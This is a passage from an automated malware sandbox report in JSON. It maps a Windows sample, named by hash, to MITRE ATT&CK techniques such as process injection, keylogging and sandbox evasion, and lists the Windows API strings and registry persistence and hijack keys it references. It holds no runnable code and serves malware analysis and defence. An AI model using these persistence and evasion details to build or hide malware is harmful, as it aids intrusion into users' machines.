{"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Clear Persistence", "attck_id": "T1070.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Odbcconf", "attck_id": "T1218.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218/008", "malicious_identifiers_count": 1, "parent": {"technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 4, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 3, "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "malicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 6, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"WinExec\" (Indicator: \"WinExec\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"WinExec\" (Indicator: \"WinExec\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-423", "type": 2, "relevance": 1, "name": "Contains ability to create directories (API string)", "description": "Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"SOFTWARE\\Classes\\MSipy\" in Source: fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\n \"Software\\Classes\\MSipv\" in Source: fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\" in Source: fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\n \"Software\\Classes\\txtfile\\shell\\open\\command\" in Source: fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\n \"Software\\Classes\\exefile\\shell\\open\\command\" in Source: fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\n \"SOFTWARE\\TENCENT\\QQ\" in Source: fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\n \"SOFTWARE\\TENCENT\\PLATFORM_TYPE_LIST\\1\" in Source: fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\n \"SOFTWARE\\GoldenSoft\\Recovery Genius 21st\" in Source: fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\n \"SOFTWARE\\GoldenSoft\\Recovery Genius\" in Source: fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\n \"SOFTWARE\\YuanZhi\\Recovery Genius 21st\" in Source: fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\n \"SOFTWARE\\YuanZhi\\Recovery Genius\" in Source: fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\n \"Software\\Policies\\Microsoft\\Internet Explorer\\Main\" in Source: 00000000-00005596.00000000.66925.00190000.00000004.mdmp\n 00000000-00005596.00000001.67056.00190000.00000004.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\" in Source: 00000000-00005596.00000001.67056.00190000.00000004.mdmp\n \"SOFTWARE\\Classes\\MSipy\" in Source: 00000000-00005596.00000001.67056.0040C000.00000080.mdmp\n \"Software\\Classes\\MSipv\" in Source: 00000000-00005596.00000001.67056.0040C000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00005596.00000001.67056.0040C000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\" in Source: 00000000-00005596.00000001.67056.0040C000.00000080.mdmp\n \"Software\\Classes\\txtfile\\shell\\open\\command\" in Source: 00000000-00005596.00000001.67056.0040C000.00000080.mdmp\n \"Software\\Classes\\exefile\\shell\\open\\command\" in Source: 00000000-00005596.00000001.67056.0040C000.00000080.mdmp\n \"SOFTWARE\\TENCENT\\QQ\" in Source: 00000000-00005596.00000001.67056.0040C000.00000080.mdmp\n \"SOFTWARE\\TENCENT\\PLATFORM_TYPE_LIST\\1\" in Source: 00000000-00005596.00000001.67056.0040C000.00000080.mdmp\n \"REGISTRY\\USER\\S-1-5-21-2092356043-4041700817-663127204-1001\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\" in Source: 00000000-00006120.00000000.66663.00180000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"RegDeleteKeyA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"RegCloseKey\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"RegSetValueExA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"RegDeleteValueA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"SystemTimeToFileTime\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"FileTimeToSystemTime\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"lstrlenA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"FreeLibrary\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetTickCount\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"SetFileTime\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetVersionExA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"WinExec\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"OpenFile\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"FileTimeToLocalFileTime\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"OpenProcess\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"DeleteFileA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"ReadProcessMemory\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetCommandLineA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetFileTime\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetTempPathA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetTempFileNameA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"SetSystemTime\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"TerminateProcess\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"CreateEventA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"Sleep\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"ShellExecuteA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetParent\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"RegisterWindowMessageA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"FindWindowA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"SetWindowPos\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"IsWindow\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"EnableWindow\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"PostMessageA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"MessageBoxA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"IsWindowEnabled\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetWindow\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetKeyState\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"ShowWindow\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"IsWindowVisible\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"SendMessageA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"SendMessageTimeoutA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"FindWindowExA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"SetTimer\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"LoadIconA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetDesktopWindow\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"GetClassNameA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"HttpSendRequestA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"InternetTimeToSystemTime\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"HttpOpenRequestA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"HttpAddRequestHeadersA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"InternetOpenA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"InternetReadFile\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"InternetConnectA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"HttpQueryInfoA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"DeleteUrlCacheEntry\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"htonl\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API (Indicator: \"inet_addr\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found 